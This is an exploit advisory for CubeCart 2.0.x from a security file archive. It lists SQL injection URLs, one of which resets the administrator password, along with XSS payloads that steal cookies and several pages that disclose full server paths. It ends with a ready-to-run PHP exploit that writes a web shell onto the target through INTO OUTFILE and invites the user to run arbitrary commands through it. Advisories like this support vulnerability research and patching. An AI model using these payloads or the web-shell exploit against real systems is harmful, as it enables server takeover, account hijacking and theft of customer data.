CubeCart.txt

CubeCart.txt: Posted Oct 3, 2006; Authored by HACKERS PAL; CubeCart suffers from multiple input validation vulnerabilities leading to cross site scripting, sql injection and full path disclosure. Php exploit included.; tags | exploit, php, vulnerability, xss, sql injection; SHA-256 | 7be55c3a5974ba564355ee56ea7e564a735efb94e0b2d3cc1dbd2fd6d16667d5; Download | Favorite | View

CubeCart.txt

Hello,,

CubeCart Multiple input Validation vulnerabilities

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net


Sql injection


admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/*
it will reset the password for the administrator
--

admin/forgot_pass.php?submit=1&user_name=-1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
--
view_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
--
view_doc.php?view_doc=-1'%20union%20select%201,2/*
--
admin/print_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
/***************************************/
xss
admin/print_order.php?order_id=<script>alert(document.cookie);</script>
--
view_order.php?order_id=<script>alert(document.cookie);</script>
--
admin/nav.php?site_url="><script>alert(document.cookie);</script><noscript>
admin/nav.php?la_search_home=<script>alert(document.cookie);</script>
and language variables for this file ..
--
admin/image.php?image=<script>alert(document.cookie);</script>
--
admin/header.inc.php?site_name=</title><script>alert(document.cookie);</script>
admin/header.inc.php?la_adm_header=</title><script>alert(document.cookie);</script>
admin/header.inc.php?charset='><script>alert(document.cookie);</script>
and all other variables in this file
--
footer.inc.php?la_pow_by=<script>alert(document.cookie);</script>
--
header.inc.php?site_name=</title><script>alert(document.cookie);</script>
and all other variables in the file.
--
/***************************************/

Full path

information.php
language.php
link_navi.php?cat_id=1
list_docs.php
popular_prod.php
sale.php
check_sum.php
spotlight.php
cat_navi.php

/***************************************/

Exploit :-

#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/* CubeCart Remote sql injection exploit
/*            By : HACKERS PAL
/*             WwW.SoQoR.NeT
/*
/* Tested on CubeCart 2.0.X  and maybe other versions are injected
*/
print_r('
/**********************************************/
/*   CubeCart Remote sql injection exploit    */
/*     by HACKERS PAL <security@soqor.net>    */
/*         site: http://www.soqor.net         */');
if ($argc<2) {
print_r('
/* --                                         */
/* Usage: php '.$argv[0].' host
/* Example:                                   */
/*  php '.$argv[0].' http://localhost/CubeCart/
/**********************************************/
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

$url=$argv[1];
$exploit1="/cat_navi.php";
         Function get_page($url)
         {

                  if(function_exists("file_get_contents"))
                  {

                       $contents = file_get_contents($url);

                          }
                          else
                          {
                              $fp=fopen("$url","r");
                              while($line=fread($fp,1024))
                              {
                               $contents=$contents.$line;
                              }


                                  }
                       return $contents;
         }

     $page = get_page($url.$exploit1);

             $pa=explode("<b>",$page);
             $pa=explode("</b>",$pa[2]);
             $path = str_replace("cat_navi.php","",$pa[0])."soqor.php";
             $var='\ ';
             $var  = str_replace(" ","",$var);
             $path = str_replace($var,"/",$path);
             $exploit2="/view_doc.php?view_doc=-1'%20union%20select%20'<?php%20system(".'$_GET[cmd]'.");%20?>','WwW.SoQoR.NeT'%20INTO%20OUTFILE%20'$path'%20from%20store_docs/*";
     $page_now = get_page($url.$exploit2);
     if(ereg("mysql_fetch_array()",$page_now))
     {
          $newurl=$url."/soqor.php?cmd=id";
          Echo "\n[+] Go TO ".str_replace("//","/",$newurl)."\n[+] Change id to any command you want :)";
     }
     else
     {
          Echo "\n[-] Exploit Faild";
     }
     Die("\n/* Visit us : WwW.SoQoR.NeT                   */\n/**********************************************/");

?>

#WwW.SoQoR.NeT

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

CubeCart.txt

CubeCart.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

CubeCart.txt

Share This

CubeCart.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems